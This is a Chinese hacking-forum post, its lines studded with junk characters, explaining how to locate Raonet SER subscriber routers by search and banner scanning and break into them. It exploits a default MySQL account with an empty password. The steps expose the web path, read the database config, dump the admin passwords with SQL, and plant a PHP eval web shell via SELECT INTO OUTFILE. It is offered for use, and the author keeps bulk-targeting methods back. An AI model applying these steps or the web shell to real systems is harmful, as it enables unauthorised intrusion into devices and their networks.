寻找存在漏洞的路由器方法:& J' _# d5 d$ W5 ]# g% Y# G
1 `1 t1 l' o+ n2 R* y# s1:google搜索'Raonet Subscriber Ethernet Router'
$ [6 b( B& Q% c* ~4 ~- g+ m5 F j h8 y
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# ^3 @$ K- K0 T0 T6 r8 H
0 b/ ?7 V: R* o& k C/ C& Z6 a8 R3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。 A: F. D* q8 o, @ d, \7 F. D% z
! N& O. G- \" V d0 J
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......& [9 `: N" @/ h& a" ]. N, F
+ G* n) z0 t* K2 S" Z7 r
) r5 I' p6 K" p4 T# z# x% ~- a9 c: S
' E8 l) Y( c( L+ `& f1 b: X入侵步骤:
/ `$ U+ Q- f; z' l8 H, V5 W* f d+ U4 q9 n) |5 ?: l+ X/ Y
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
0 L5 o" u* j6 k4 O l4 h/ D w# T& V
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc, o$ M3 ]- _/ ] }# O
3:得到密码后连接,查看GUI管理密码:5 J5 E; P F0 k7 ?
use ser_500/ y: X* M& z8 O9 @
select id,passwd from user;, g2 [- \; c- W. p
4:通过数据库写入webshell,执行命令:
: q1 y: _! j6 z' N" vuse mysql;
0 I! I/ ]- Z% E! D1 D Q. @create table ok(cmd TEXT);
* L+ j" ]! Q) O0 Qinsert into ok values("<?php @eval($_POST[cmd])?>");
# a0 f2 o) x$ f6 \, k1 s! [; tselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";1 ^+ C1 j* \- J* E: ~
drop table ok;
+ t1 N; \- s, Z1 k, a; z( Z$ q4 e: ?
5:连接后门shell.php ) ~3 J0 J( d* ]
+ Y3 a' z' N6 \9 n+ {* @* x6. 搞定!
1 b* W0 D- X# G/ Z ]
4 s& _/ O7 y7 i1 b, A' o# a |